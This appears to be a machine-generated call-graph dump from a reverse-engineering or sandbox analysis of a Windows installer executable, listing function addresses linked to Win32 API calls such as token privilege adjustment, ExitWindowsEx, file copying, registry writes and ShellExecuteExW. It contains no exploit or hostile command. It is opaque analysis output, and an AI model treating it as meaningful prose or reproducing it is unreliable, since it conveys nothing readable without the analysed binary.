3716 4035a7 12 API calls 3711->3716 3713 403a7d 3712->3713 3714 40395d 3712->3714 3719 403b01 ExitProcess 3713->3719 3720 403a85 GetCurrentProcess OpenProcessToken 3713->3720 3718 405ba2 MessageBoxIndirectW 3714->3718 3868 40653c lstrcpynW 3715->3868 3721 403874 3716->3721 3717->3700 3727 40396b ExitProcess 3718->3727 3728 403ad1 3720->3728 3729 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3720->3729 3721->3704 3721->3712 3734 4038af 3723->3734 3725 403943 3725->3712 3730 406931 5 API calls 3728->3730 3729->3728 3733 403ad8 3730->3733 3731 403973 3735 405b0d 5 API calls 3731->3735 3732 40390d 3869 405f19 3732->3869 3737 403aed ExitWindowsEx 3733->3737 3738 403afa 3733->3738 3734->3731 3734->3732 3739 403978 lstrcatW 3735->3739 3737->3719 3737->3738 3891 40140b 3738->3891 3742 403994 lstrcatW lstrcmpiW 3739->3742 3743 403989 lstrcatW 3739->3743 3742->3712 3744 4039b0 3742->3744 3743->3742 3746 4039b5 3744->3746 3747 4039bc 3744->3747 3749 405a73 4 API calls 3746->3749 3751 405af0 2 API calls 3747->3751 3748 403928 3884 40653c lstrcpynW 3748->3884 3753 4039ba 3749->3753 3752 4039c1 SetCurrentDirectoryW 3751->3752 3755 4039d1 3752->3755 3756 4039dc 3752->3756 3753->3752 3812 403c0b 3754->3812 3885 40653c lstrcpynW 3755->3885 3886 40653c lstrcpynW 3756->3886 3759 406579 17 API calls 3760 403a1b DeleteFileW 3759->3760 3761 403a28 CopyFileW 3760->3761 3767 4039ea 3760->3767 3761->3767 3762 403a71 3763 406302 36 API calls 3762->3763 3765 403a78 3763->3765 3765->3712 3766 406579 17 API calls 3766->3767 3767->3759 3767->3762 3767->3766 3768 405b25 2 API calls 3767->3768 3769 403a5c CloseHandle 3767->3769 3887 406302 MoveFileExW 3767->3887 3768->3767 3769->3767 3770->3695 3771->3697 3773 4067eb 5 API calls 3772->3773 3774 4035b3 3773->3774 3775 4035bd 3774->3775 3776 405e11 3 API calls 3774->3776 3775->3702 3777 4035c5 3776->3777 3778 405af0 2 API calls 3777->3778 3779 4035cb 3778->3779 3894 406061 3779->3894 3898 406032 GetFileAttributesW CreateFileW 3782->3898 3784 4030ab 3811 4030b8 3784->3811 3899 40653c lstrcpynW 3784->3899 3786 4030ce 3900 405e5d lstrlenW 3786->3900 3790 4030df GetFileSize 3791 4030f6 3790->3791 3806 4031d9 3790->3806 3794 40357a ReadFile 3791->3794 3798 403276 3791->3798 3805 402fc6 32 API calls 3791->3805 3791->3806 3791->3811 3792 402fc6 32 API calls 3793 4031e2 3792->3793 3795 40321e GlobalAlloc 3793->3795 3793->3811 3906 403590 SetFilePointer 3793->3906 3794->3791 3796 403235 3795->3796 3801 406061 2 API calls 3796->3801 3799 402fc6 32 API calls 3798->3799 3799->3811 3800 4031ff 3802 40357a ReadFile 3800->3802 3803 403246 CreateFileW 3801->3803 3804 40320a 3802->3804 3807 403280 3803->3807 3803->3811 3804->3795 3804->3811 3805->3791 3806->3792 3905 403590 SetFilePointer 3807->3905 3809 40328e 3810 403309 44 API calls 3809->3810 3810->3811 3811->3710 3813 406931 5 API calls 3812->3813 3814 403c1f 3813->3814 3815 403c25 GetUserDefaultUILanguage 3814->3815 3816 403c37 3814->3816 3907 406483 wsprintfW 3815->3907 3818 40640a 3 API calls 3816->3818 3820 403c67 3818->3820 3819 403c35 3908 403ee1 3819->3908 3821 403c86 lstrcatW 3820->3821 3822 40640a 3 API calls 3820->3822 3821->3819 3822->3821 3825 405f19 18 API calls 3826 403cb8 3825->3826 3827 403d4c 3826->3827 3829 40640a 3 API calls 3826->3829 3828 405f19 18 API calls 3827->3828 3830 403d52 3828->3830 3831 403cea 3829->3831 3832 403d62 LoadImageW 3830->3832 3833 406579 17 API calls 3830->3833 3831->3827 3836 403d0b lstrlenW 3831->3836 3840 405e3e CharNextW 3831->3840 3834 403e08 3832->3834 3835 403d89 RegisterClassW 3832->3835 3833->3832 3839 40140b 2 API calls 3834->3839 3837 403e12 3835->3837 3838 403dbf SystemParametersInfoW CreateWindowExW 3835->3838 3841 403d19 lstrcmpiW 3836->3841 3842 403d3f 3836->3842 3837->3725 3838->3834 3843 403e0e 3839->3843 3845 403d08 3840->3845 3841->3842 3846 403d29 GetFileAttributesW 3841->3846 3844 405e11 3 API calls 3842->3844 3843->3837 3847 403ee1 18 API calls 3843->3847 3848 403d45 3844->3848 3845->3836 3849 403d35 3846->3849 3851 403e1f 3847->3851 3916 40653c lstrcpynW 3848->3916 3849->3842 3850 405e5d 2 API calls 3849->3850 3850->3842 3853 403e2b ShowWindow 3851->3853 3854 403eae 3851->3854 3856 4068c1 3 API calls 3853->3856 3855 405677 5 API calls 3854->3855 3857 403eb4 3855->3857 3860 403e43 3856->3860 3858 403ed0 3857->3858 3861 403eb8 3857->3861 3862 40140b 2 API calls 3858->3862 3859 403e51 GetClassInfoW 3864 403e65 GetClassInfoW RegisterClassW 3859->3864 3865 403e7b DialogBoxParamW 3859->3865 3860->3859 3863 4068c1 3 API calls 3860->3863 3861->3837 3866 40140b 2 API calls 3861->3866 3862->3837 3863->3859 3864->3865 3867 40140b 2 API calls 3865->3867 3866->3837 3867->3837 3868->3717 3921 40653c lstrcpynW 3869->3921 3871 405f2a 3872 405ebc 4 API calls 3871->3872 3873 405f30 3872->3873 3874 403919 3873->3874 3875 4067eb 5 API calls 3873->3875 3874->3712 3883 40653c lstrcpynW 3874->3883 3881 405f40 3875->3881 3876 405f71 lstrlenW 3877 405f7c 3876->3877 3876->3881 3879 405e11 3 API calls 3877->3879 3878 40689a 2 API calls 3878->3881 3880 405f81 GetFileAttributesW 3879->3880 3880->3874 3881->3874 3881->3876 3881->3878 3882 405e5d 2 API calls 3881->3882 3882->3876 3883->3748 3884->3754 3885->3756 3886->3767 3888 406316 3887->3888 3890 406323 3887->3890 3922 406188 3888->3922 3890->3767 3892 401389 2 API calls 3891->3892 3893 401420 3892->3893 3893->3719 3895 40606e GetTickCount GetTempFileNameW 3894->3895 3896 4060a4 3895->3896 3897 4035d6 3895->3897 3896->3895 3896->3897 3897->3702 3898->3784 3899->3786 3901 405e6b 3900->3901 3902 405e71 CharPrevW 3901->3902 3903 4030d4 3901->3903 3902->3901 3902->3903 3904 40653c lstrcpynW 3903->3904 3904->3790 3905->3809 3906->3800 3907->3819 3909 403ef5 3908->3909 3917 406483 wsprintfW 3909->3917 3911 403f66 3918 403f9a 3911->3918 3913 403c96 3913->3825 3914 403f6b 3914->3913 3915 406579 17 API calls 3914->3915 3915->3914 3916->3827 3917->3911 3919 406579 17 API calls 3918->3919 3920 403fa8 SetWindowTextW 3919->3920 3920->3914 3921->3871 3923 4061b8 3922->3923 3924 4061de GetShortPathNameW 3922->3924 3949 406032 GetFileAttributesW CreateFileW 3923->3949 3926 4061f3 3924->3926 3927 4062fd 3924->3927 3926->3927 3929 4061fb wsprintfA 3926->3929 3927->3890 3928 4061c2 CloseHandle GetShortPathNameW 3928->3927 3930 4061d6 3928->3930 3931 406579 17 API calls 3929->3931 3930->3924 3930->3927 3932 406223 3931->3932 3950 406032 GetFileAttributesW CreateFileW 3932->3950 3934 406230 3934->3927 3935 40623f GetFileSize GlobalAlloc 3934->3935 3936 406261 3935->3936 3937 4062f6 CloseHandle 3935->3937 3938 4060b5 ReadFile 3936->3938 3937->3927 3939 406269 3938->3939 3939->3937 3951 405f97 lstrlenA 3939->3951 3942 406280 lstrcpyA 3945 4062a2 3942->3945 3943 406294 3944 405f97 4 API calls 3943->3944 3944->3945 3946 4062d9 SetFilePointer 3945->3946 3947 4060e4 WriteFile 3946->3947 3948 4062ef GlobalFree 3947->3948 3948->3937 3949->3928 3950->3934 3952 405fd8 lstrlenA 3951->3952 3953 405fe0 3952->3953 3954 405fb1 lstrcmpiA 3952->3954 3953->3942 3953->3943 3954->3953 3955 405fcf CharNextA 3954->3955 3955->3952 4322 404cd9 4323 404d05 4322->4323 4324 404ce9 4322->4324 4326 404d38 4323->4326 4327 404d0b SHGetPathFromIDListW 4323->4327 4333 405b86 GetDlgItemTextW 4324->4333 4329 404d22 SendMessageW 4327->4329 4330 404d1b 4327->4330 4328 404cf6 SendMessageW 4328->4323 4329->4326 4332 40140b 2 API calls 4330->4332 4332->4329 4333->4328 4334 406c5b 4335 406adf 4334->4335 4336 40744a 4335->4336 4337 406b60 GlobalFree 4335->4337 4338 406b69 GlobalAlloc 4335->4338 4339 406be0 GlobalAlloc 4335->4339 4340 406bd7 GlobalFree 4335->4340 4337->4338 4338->4335 4338->4336 4339->4335 4339->4336 4340->4339 4341 40175c 4342 402d3e 17 API calls 4341->4342 4343 401763 4342->4343 4344 406061 2 API calls 4343->4344 4345 40176a 4344->4345 4345->4345 4346 401d5d 4347 402d1c 17 API calls 4346->4347 4348 401d6e SetWindowLongW 4347->4348 4349 402bc2 4348->4349 4103 401ede 4104 402d1c 17 API calls 4103->4104 4105 401ee4 4104->4105 4106 402d1c 17 API calls 4105->4106 4107 401ef0 4106->4107 4108 401f07 EnableWindow 4107->4108 4109 401efc ShowWindow 4107->4109 4110 402bc2 4108->4110 4109->4110 3451 4056e3 3452 405704 GetDlgItem GetDlgItem GetDlgItem 3451->3452 3453 40588d 3451->3453 3496 4044c7 SendMessageW 3452->3496 3455 405896 GetDlgItem CreateThread FindCloseChangeNotification 3453->3455 3456 4058be 3453->3456 3455->3456 3519 405677 OleInitialize 3455->3519 3458 4058e9 3456->3458 3460 4058d5 ShowWindow ShowWindow 3456->3460 3461 40590e 3456->3461 3457 405774 3466 40577b GetClientRect GetSystemMetrics SendMessageW SendMessageW 3457->3466 3459 405949 3458->3459 3463 405923 ShowWindow 3458->3463 3464 4058fd 3458->3464 3459->3461 3473 405957 SendMessageW 3459->3473 3501 4044c7 SendMessageW 3460->3501 3505 4044f9 3461->3505 3469 405943 3463->3469 3470 405935 3463->3470 3502 40446b 3464->3502 3471 4057e9 3466->3471 3472 4057cd SendMessageW SendMessageW 3466->3472 3468 40591c 3478 40446b SendMessageW 3469->3478 3477 4055a4 24 API calls 3470->3477 3474 4057fc 3471->3474 3475 4057ee SendMessageW 3471->3475 3472->3471 3473->3468 3476 405970 CreatePopupMenu 3473->3476 3497 404492 3474->3497 3475->3474 3479 406579 17 API calls 3476->3479 3477->3469 3478->3459 3481 405980 AppendMenuW 3479->3481 3483 4059b0 TrackPopupMenu 3481->3483 3484 40599d GetWindowRect 3481->3484 3482 40580c 3485 405815 ShowWindow 3482->3485 3486 405849 GetDlgItem SendMessageW 3482->3486 3483->3468 3487 4059cb 3483->3487 3484->3483 3488 405838 3485->3488 3489 40582b ShowWindow 3485->3489 3486->3468 3490 405870 SendMessageW SendMessageW 3486->3490 3491 4059e7 SendMessageW 3487->3491 3500 4044c7 SendMessageW 3488->3500 3489->3488 3490->3468 3491->3491 3492 405a04 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3491->3492 3494 405a29 SendMessageW 3492->3494 3494->3494 3495 405a52 GlobalUnlock SetClipboardData CloseClipboard 3494->3495 3495->3468 3496->3457 3498 406579 17 API calls 3497->3498 3499 40449d SetDlgItemTextW 3498->3499 3499->3482 3500->3486 3501->3458 3503 404472 3502->3503 3504 404478 SendMessageW 3502->3504 3503->3504 3504->3461 3506 4045bc 3505->3506 3507 404511 GetWindowLongW 3505->3507 3506->3468 3507->3506 3508 404526 3507->3508 3508->3506 3509 404553 GetSysColor 3508->3509 3510 404556 3508->3510 3509->3510 3511 404566 SetBkMode 3510->3511 3512 40455c SetTextColor 3510->3512 3513 404584 3511->3513 3514 40457e GetSysColor 3511->3514 3512->3511 3515 404595 3513->3515 3516 40458b SetBkColor 3513->3516 3514->3513 3515->3506 3517 4045a8 DeleteObject 3515->3517 3518 4045af CreateBrushIndirect 3515->3518 3516->3515 3517->3518 3518->3506 3526 4044de 3519->3526 3521 40569a 3525 4056c1 3521->3525 3529 401389 3521->3529 3522 4044de SendMessageW 3523 4056d3 OleUninitialize 3522->3523 3525->3522 3527 4044f6 3526->3527 3528 4044e7 SendMessageW 3526->3528 3527->3521 3528->3527 3531 401390 3529->3531 3530 4013fe 3530->3521 3531->3530 3532 4013cb MulDiv SendMessageW 3531->3532 3532->3531 4350 401563 4351 402b08 4350->4351 4354 406483 wsprintfW 4351->4354 4353 402b0d 4354->4353 4362 4026e4 4363 402d1c 17 API calls 4362->4363 4371 4026f3 4363->4371 4364 402830 4365 40273d ReadFile 4365->4364 4365->4371 4366 4060b5 ReadFile 4366->4371 4368 402832 4384 406483 wsprintfW 4368->4384 4369 40277d MultiByteToWideChar 4369->4371 4371->4364 4371->4365 4371->4366 4371->4368 4371->4369 4372 4027a3 SetFilePointer MultiByteToWideChar 4371->4372 4373 402843 4371->4373 4375 406113 SetFilePointer 4371->4375 4372->4371 4373->4364 4374 402864 SetFilePointer 4373->4374 4374->4364 4376 40612f 4375->4376 4378 406147 4375->4378 4377 4060b5 ReadFile 4376->4377 4379 40613b 4377->4379 4378->4371 4379->4378 4380 406150 SetFilePointer 4379->4380 4381 406178 SetFilePointer 4379->4381 4380->4381 4382 40615b 4380->4382 4381->4378 4383 4060e4 WriteFile 4382->4383 4383->4378 4384->4364 3561 405b68 ShellExecuteExW 4385 401968 4386 402d1c 17 API calls 4385->4386 4387 40196f 4386->4387 4388 402d1c 17 API calls 4387->4388 4389 40197c 4388->4389 4390 402d3e 17 API calls 4389->4390 4391 401993 lstrlenW 4390->4391 4392 4019a4 4391->4392 4393 4019e5 4392->4393 4397 40653c lstrcpynW 4392->4397 4395 4019d5 4395->4393 4396 4019da lstrlenW 4395->4396 4396->4393 4397->4395 4398 40166a 4399 402d3e 17 API calls 4398->4399 4400 401670 4399->4400 4401 40689a 2 API calls 4400->4401 4402 401676 4401->4402 3572 4023ec 3573 402d3e 17 API calls 3572->3573 3574 4023fb 3573->3574 3575 402d3e 17 API calls 3574->3575 3576 402404 3575->3576 3577 402d3e 17 API calls 3576->3577 3578 40240e GetPrivateProfileStringW 3577->3578 3610 40176f 3611 402d3e 17 API calls 3610->3611 3612 401776 3611->3612 3613 401796 3612->3613 3614 40179e 3612->3614 3652 40653c lstrcpynW 3613->3652 3653 40653c lstrcpynW 3614->3653 3617 40179c 3621 4067eb 5 API calls 3617->3621 3618 4017a9 3654 405e11 lstrlenW CharPrevW 3618->3654 3626 4017bb 3621->3626 3625 4017cd CompareFileTime 3625->3626 3626->3625 3627 40188d 3626->3627 3630 40653c lstrcpynW 3626->3630 3636 406579 17 API calls 3626->3636 3645 401864 3626->3645 3648 40600d GetFileAttributesW 3626->3648 3651 406032 GetFileAttributesW CreateFileW 3626->3651 3657 40689a FindFirstFileW 3626->3657 3660 405ba2 3626->3660 3628 4055a4 24 API calls 3627->3628 3631 401897 3628->3631 3629 4055a4 24 API calls 3647 401879 3629->3647 3630->3626 3632 403309 44 API calls 3631->3632 3633 4018aa 3632->3633 3634 4018be SetFileTime 3633->3634 3635 4018d0 FindCloseChangeNotification 3633->3635 3634->3635 3637 4018e1 3635->3637 3635->3647 3636->3626 3638 4018e6 3637->3638 3639 4018f9 3637->3639 3640 406579 17 API calls 3638->3640 3641 406579 17 API calls 3639->3641 3643 4018ee lstrcatW 3640->3643 3644 401901 3641->3644 3643->3644 3646 405ba2 MessageBoxIndirectW 3644->3646 3645->3629 3645->3647 3646->3647 3649 40602c 3648->3649 3650 40601f SetFileAttributesW 3648->3650 3649->3626 3650->3649 3651->3626 3652->3617 3653->3618 3655 4017af lstrcatW 3654->3655 3656 405e2d lstrcatW 3654->3656 3655->3617 3656->3655 3658 4068b0 FindClose 3657->3658 3659 4068bb 3657->3659 3658->3659 3659->3626 3661 405bb7 3660->3661 3662 405bcb MessageBoxIndirectW 3661->3662 3663 405c03 3661->3663 3662->3663 3663->3626 4403 401a72 4404 402d1c 17 API calls 4403->4404 4405 401a7b 4404->4405 4406 402d1c 17 API calls 4405->4406 4407 401a20 4406->4407 3664 401573 3665 401583 ShowWindow 3664->3665 3666 40158c 3664->3666 3665->3666 3667 402bc2 3666->3667 3668 40159a ShowWindow 3666->3668 3668->3667 4408 4014f5 SetForegroundWindow 4409 402bc2 4408->4409 4410 401ff6 4411 402d3e 17 API calls 4410->4411 4412 401ffd 4411->4412 4413 40689a 2 API calls 4412->4413 4414 402003 4413->4414 4416 402014 4414->4416 4417 406483 wsprintfW 4414->4417 4417->4416 4418 401b77 4419 402d3e 17 API calls 4418->4419 4420 401b7e 4419->4420 4421 402d1c 17 API calls 4420->4421 4422 401b87 wsprintfW 4421->4422 4423 402bc2 4422->4423 4424 4022f7 4425 402d3e 17 API calls 4424->4425 4426 4022fd 4425->4426 4427 402d3e 17 API calls 4426->4427 4428 402306 4427->4428 4429 402d3e 17 API calls 4428->4429 4430 40230f 4429->4430 4431 40689a 2 API calls 4430->4431 4432 402318 4431->4432 4433 402329 lstrlenW lstrlenW 4432->4433 4437 40231c 4432->4437 4435 4055a4 24 API calls 4433->4435 4434 4055a4 24 API calls 4438 402324 4434->4438 4436 402367 SHFileOperationW 4435->4436 4436->4437 4436->4438 4437->4434 4437->4438 4089 40167b 4090 402d3e 17 API calls 4089->4090 4091 401682 4090->4091 4092 402d3e 17 API calls 4091->4092 4093 40168b 4092->4093 4094 402d3e 17 API calls 4093->4094 4095 401694 MoveFileW 4094->4095 4096 4016a0 4095->4096 4097 4016a7 4095->4097 4098 401423 24 API calls 4096->4098 4099 40689a 2 API calls 4097->4099 4101 4022ee 4097->4101 4098->4101 4100 4016b6 4099->4100 4100->4101 4102 406302 36 API calls 4100->4102 4102->4096 4446 40237b 4447 402382 4446->4447 4451 402395 4446->4451 4448 406579 17 API calls 4447->4448 4449 40238f 4448->4449 4450 405ba2 MessageBoxIndirectW 4449->4450 4450->4451 4452 404eff GetDlgItem GetDlgItem 4453 404f53 7 API calls 4452->4453 4465 40517d 4452->4465 4454 404ff0 SendMessageW 4453->4454 4455 404ffd DeleteObject 4453->4455 4454->4455 4456 405008 4455->4456 4457 40503f 4456->4457 4459 406579 17 API calls 4456->4459 4460 404492 18 API calls 4457->4460 4458 405265 4461 40530e 4458->4461 4467 405170 4458->4467 4472 4052bb SendMessageW 4458->4472 4462 405021 SendMessageW SendMessageW 4459->4462 4466 405053 4460->4466 4463 405323 4461->4463 4464 405317 SendMessageW 4461->4464 4462->4456 4474 405335 ImageList_Destroy 4463->4474 4475 40533c 4463->4475 4483 40534c 4463->4483 4464->4463 4465->4458 4486 4051ef 4465->4486 4506 404e4d SendMessageW 4465->4506 4471 404492 18 API calls 4466->4471 4469 4044f9 8 API calls 4467->4469 4468 405257 SendMessageW 4468->4458 4473 405511 4469->4473 4487 405064 4471->4487 4472->4467 4477 4052d0 SendMessageW 4472->4477 4474->4475 4478 405345 GlobalFree 4475->4478 4475->4483 4476 4054c5 4476->4467 4481 4054d7 ShowWindow GetDlgItem ShowWindow 4476->4481 4480 4052e3 4477->4480 4478->4483 4479 40513f GetWindowLongW SetWindowLongW 4482 405158 4479->4482 4488 4052f4 SendMessageW 4480->4488 4481->4467 4484 405175 4482->4484 4485 40515d ShowWindow 4482->4485 4483->4476 4497 405387 4483->4497 4511 404ecd 4483->4511 4505 4044c7 SendMessageW 4484->4505 4504 4044c7 SendMessageW 4485->4504 4486->4458 4486->4468 4487->4479 4489 40513a 4487->4489 4493 4050b7 SendMessageW 4487->4493 4495 4050f5 SendMessageW 4487->4495 4496 405109 SendMessageW 4487->4496 4488->4461 4489->4479 4489->4482 4490 4053cb 4498 405491 4490->4498 4502 40543f SendMessageW SendMessageW 4490->4502 4493->4487 4495->4487 4496->4487 4497->4490 4500 4053b5 SendMessageW 4497->4500 4499 40549b InvalidateRect 4498->4499 4501 4054a7 4498->4501 4499->4501 4500->4490 4501->4476 4520 404e08 4501->4520 4502->4490 4504->4467 4505->4465 4507 404e70 GetMessagePos ScreenToClient SendMessageW 4506->4507 4508 404eac SendMessageW 4506->4508 4509 404ea9 4507->4509 4510 404ea4 4507->4510 4508->4510 4509->4508 4510->4486 4523 40653c lstrcpynW 4511->4523 4513 404ee0 4524 406483 wsprintfW 4513->4524 4515 404eea 4516 40140b 2 API calls 4515->4516 4517 404ef3 4516->4517 4525 40653c lstrcpynW 4517->4525 4519 404efa 4519->4497 4526 404d3f 4520->4526 4522 404e1d 4522->4476 4523->4513 4524->4515 4525->4519 4527 404d58 4526->4527 4528 406579 17 API calls 4527->4528 4529 404dbc 4528->4529 4530 406579 17 API calls 4529->4530 4531 404dc7 4530->4531 4532 406579 17 API calls 4531->4532 4533 404ddd lstrlenW wsprintfW SetDlgItemTextW 4532->4533 4533->4522 4534 4019ff 4535 402d3e 17 API calls 4534->4535 4536 401a06 4535->4536 4537 402d3e 17 API calls 4536->4537 4538 401a0f 4537->4538 4539 401a16 lstrcmpiW 4538->4539 4540 401a28 lstrcmpW 4538->4540 4541 401a1c 4539->4541 4540->4541 4542 401000 4543 401037 BeginPaint GetClientRect 4542->4543 4544 40100c DefWindowProcW 4542->4544 4546 4010f3 4543->4546 4547 401179 4544->4547 4548 401073 CreateBrushIndirect FillRect DeleteObject 4546->4548 4549 4010fc 4546->4549 4548->4546 4550 401102 CreateFontIndirectW 4549->4550 4551 401167 EndPaint 4549->4551 4550->4551 4552 401112 6 API calls 4550->4552 4551->4547 4552->4551 4553 401d81 4554 401d94 GetDlgItem 4553->4554 4555 401d87 4553->4555 4557 401d8e 4554->4557 4556 402d1c 17 API calls 4555->4556 4556->4557 4558 402d3e 17 API calls 4557->4558 4560 401dd5 GetClientRect LoadImageW SendMessageW 4557->4560 4558->4560 4561 401e33 4560->4561 4563 401e3f 4560->4563 4562 401e38 DeleteObject 4561->4562 4561->4563 4562->4563 3331 402482 3332 402d3e 17 API calls 3331->3332 3333 402494 3332->3333 3334 402d3e 17 API calls 3333->3334 3335 40249e 3334->3335 3348 402dce 3335->3348 3338 4024d6 3345 4024e2 3338->3345 3352 402d1c 3338->3352 3339 402d3e 17 API calls 3341 4024cc lstrlenW 3339->3341 3340 402925 3341->3338 3343 402501 RegSetValueExW 3344 402517 RegCloseKey 3343->3344 3344->3340 3345->3343 3355 403309 3345->3355 3349 402de9 3348->3349 3370 4063d7 3349->3370 3353 406579 17 API calls 3352->3353 3354 402d31 3353->3354 3354->3345 3356 403334 3355->3356 3357 403318 SetFilePointer 3355->3357 3374 403411 GetTickCount 3356->3374 3357->3356 3360 4033d1 3360->3343 3363 403411 42 API calls 3364 40336b 3363->3364 3364->3360 3365 4033d7 ReadFile 3364->3365 3367 40337a 3364->3367 3365->3360 3367->3360 3368 4060b5 ReadFile 3367->3368 3389 4060e4 WriteFile 3367->3389 3368->3367 3371 4063e6 3370->3371 3372 4063f1 RegCreateKeyExW 3371->3372 3373 4024ae 3371->3373 3372->3373 3373->3338 3373->3339 3373->3340 3375 403569 3374->3375 3376 40343f 3374->3376 3377 402fc6 32 API calls 3375->3377 3391 403590 SetFilePointer 3376->3391 3379 40333b 3377->3379 3379->3360 3387 4060b5 ReadFile 3379->3387 3380 40344a SetFilePointer 3381 40346f 3380->3381 3381->3379 3385 4060e4 WriteFile 3381->3385 3386 40354a SetFilePointer 3381->3386 3392 40357a 3381->3392 3395 406aac 3381->3395 3402 402fc6 3381->3402 3385->3381 3386->3375 3388 403354 3387->3388 3388->3360 3388->3363 3390 406102 3389->3390 3390->3367 3391->3380 3393 4060b5 ReadFile 3392->3393 3394 40358d 3393->3394 3394->3381 3396 406ad1 3395->3396 3399 406ad9 3395->3399 3396->3381 3397 406b60 GlobalFree 3398 406b69 GlobalAlloc 3397->3398 3398->3396 3398->3399 3399->3396 3399->3397 3399->3398 3400 406be0 GlobalAlloc 3399->3400 3401 406bd7 GlobalFree 3399->3401 3400->3396 3400->3399 3401->3400 3403 402fd7 3402->3403 3404 402fef 3402->3404 3407 402fe0 DestroyWindow 3403->3407 3410 402fe7 3403->3410 3405 402ff7 3404->3405 3406 402fff GetTickCount 3404->3406 3417 40696d 3405->3417 3409 40300d 3406->3409 3406->3410 3407->3410 3411 403042 CreateDialogParamW ShowWindow 3409->3411 3412 403015 3409->3412 3410->3381 3411->3410 3412->3410 3421 402faa 3412->3421 3414 403023 wsprintfW 3415 4055a4 24 API calls 3414->3415 3416 403040 3415->3416 3416->3410 3418 40698a PeekMessageW 3417->3418 3419 406980 DispatchMessageW 3418->3419 3420 40699a 3418->3420 3419->3418 3420->3410 3422 402fb9 3421->3422 3423 402fbb MulDiv 3421->3423 3422->3423 3423->3414 3424 402902 3425 402d3e 17 API calls 3424->3425 3426 402909 FindFirstFileW 3425->3426 3427 402931 3426->3427 3430 40291c 3426->3430 3432 406483 wsprintfW 3427->3432 3429 40293a 3433 40653c lstrcpynW 3429->3433 3432->3429 3433->3430 4564 404602 lstrlenW 4565 404621 4564->4565 4566 404623 WideCharToMultiByte 4564->4566 4565->4566 4567 401503 4568 40150b 4567->4568 4570 40151e 4567->4570 4569 402d1c 17 API calls 4568->4569 4569->4570 4571 404983 4572 4049c0 4571->4572 4573 4049af 4571->4573 4575 4049cc GetDlgItem 4572->4575 4580 404a2b 4572->4580 4632 405b86 GetDlgItemTextW 4573->4632 4577 4049e0 4575->4577 4576 4049ba 4579 4067eb 5 API calls 4576->4579 4582 4049f4 SetWindowTextW 4577->4582 4587 405ebc 4 API calls 4577->4587 4578 404b0f 4630 404cbe 4578->4630 4634 405b86 GetDlgItemTextW 4578->4634 4579->4572 4580->4578 4584 406579 17 API calls 4580->4584 4580->4630 4585 404492 18 API calls 4582->4585 4583 404b3f 4588 405f19 18 API calls 4583->4588 4589 404a9f SHBrowseForFolderW 4584->4589 4590 404a10 4585->4590 4586 4044f9 8 API calls 4591 404cd2 4586->4591 4592 4049ea 4587->4592 4593 404b45 4588->4593 4589->4578 4594 404ab7 CoTaskMemFree 4589->4594 4595 404492 18 API calls 4590->4595 4592->4582 4596 405e11 3 API calls 4592->4596 4635 40653c lstrcpynW 4593->4635 4597 405e11 3 API calls 4594->4597 4598 404a1e 4595->4598 4596->4582 4599 404ac4 4597->4599 4633 4044c7 SendMessageW 4598->4633 4602 404afb SetDlgItemTextW 4599->4602 4607 406579 17 API calls 4599->4607 4602->4578 4603 404a24 4605 406931 5 API calls 4603->4605 4604 404b5c 4606 406931 5 API calls 4604->4606 4605->4580 4614 404b63 4606->4614 4608 404ae3 lstrcmpiW 4607->4608 4608->4602 4611 404af4 lstrcatW 4608->4611 4609 404ba4 4636 40653c lstrcpynW 4609->4636 4611->4602 4612 404bab 4613 405ebc 4 API calls 4612->4613 4615 404bb1 GetDiskFreeSpaceW 4613->4615 4614->4609 4617 405e5d 2 API calls 4614->4617 4619 404bfc 4614->4619 4618 404bd5 MulDiv 4615->4618 4615->4619 4617->4614 4618->4619 4620 404c6d 4619->4620 4621 404e08 20 API calls 4619->4621 4622 404c90 4620->4622 4623 40140b 2 API calls 4620->4623 4624 404c5a 4621->4624 4637 4044b4 KiUserCallbackDispatcher 4622->4637 4623->4622 4626 404c6f SetDlgItemTextW 4624->4626 4627 404c5f 4624->4627 4626->4620 4629 404d3f 20 API calls 4627->4629 4628 404cac 4628->4630 4631 4048dc SendMessageW 4628->4631 4629->4620 4630->4586 4631->4630 4632->4576 4633->4603 4634->4583 4635->4604 4636->4612 4637->4628 4638 402889 4639 402890 4638->4639 4645 402b0d 4638->4645 4640 402d1c 17 API calls 4639->4640 4641 402897 4640->4641 4642 4028a6 SetFilePointer 4641->4642 4643 4028b6 4642->4643 4642->4645 4646 406483 wsprintfW 4643->4646 4646->4645 4647 40190c 4648 401943 4647->4648 4649 402d3e 17 API calls 4648->4649 4650 401948 4649->4650 4651 405c4e 67 API calls 4650->4651 4652 401951 4651->4652 4653 40190f 4654 402d3e 17 API calls 4653->4654 4655 401916 4654->4655 4656 405ba2 MessageBoxIndirectW 4655->4656 4657 40191f 4656->4657 4665 401491 4666 4055a4 24 API calls 4665->4666 4667 401498 4666->4667 4675 401f12 4676 402d3e 17 API calls 4675->4676 4677 401f18 4676->4677 4678 402d3e 17 API calls 4677->4678 4679 401f21 4678->4679 4680 402d3e 17 API calls 4679->4680 4681 401f2a 4680->4681 4682 402d3e 17 API calls 4681->4682 4683 401f33 4682->4683 4684 401423 24 API calls 4683->4684 4685 401f3a 4684->4685 4692 405b68 ShellExecuteExW 4685->4692 4687 401f82 4688 4069dc 5 API calls 4687->4688 4689 402925 4687->4689 4690 401f9f CloseHandle 4688->4690 4690->4689 4692->4687 4693 402614 4694 402d3e 17 API calls 4693->4694 4695 40261b 4694->4695 4698 406032 GetFileAttributesW CreateFileW 4695->4698 4697 402627 4698->4697 3669 402596 3670 402d7e 17 API calls 3669->3670 3671 4025a0 3670->3671 3672 402d1c 17 API calls 3671->3672 3673 4025a9 3672->3673 3674 4025d1 RegEnumValueW 3673->3674 3675 4025c5 RegEnumKeyW 3673->3675 3677 402925 3673->3677 3676 4025e6 3674->3676 3678 4025ed RegCloseKey 3674->3678 3675->3678 3676->3678 3678->3677 4699 401d17 4700 402d1c 17 API calls 4699->4700 4701 401d1d IsWindow 4700->4701 4702 401a20 4701->4702 4703 405518 4704 405528 4703->4704 4705 40553c 4703->4705 4706 40552e 4704->4706 4715 405585 4704->4715 4707 405544 IsWindowVisible 4705->4707 4713 40555b 4705->4713 4709 4044de SendMessageW 4706->4709 4710 405551 4707->4710 4707->4715 4708 40558a CallWindowProcW 4711 405538 4708->4711 4709->4711 4712 404e4d 5 API calls 4710->4712 4712->4713 4713->4708 4714 404ecd 4 API calls 4713->4714 4714->4715 4715->4708 3956 403b19 3957 403b34 3956->3957 3958 403b2a CloseHandle 3956->3958 3959 403b48 3957->3959 3960 403b3e CloseHandle 3957->3960 3958->3957 3965 403b76 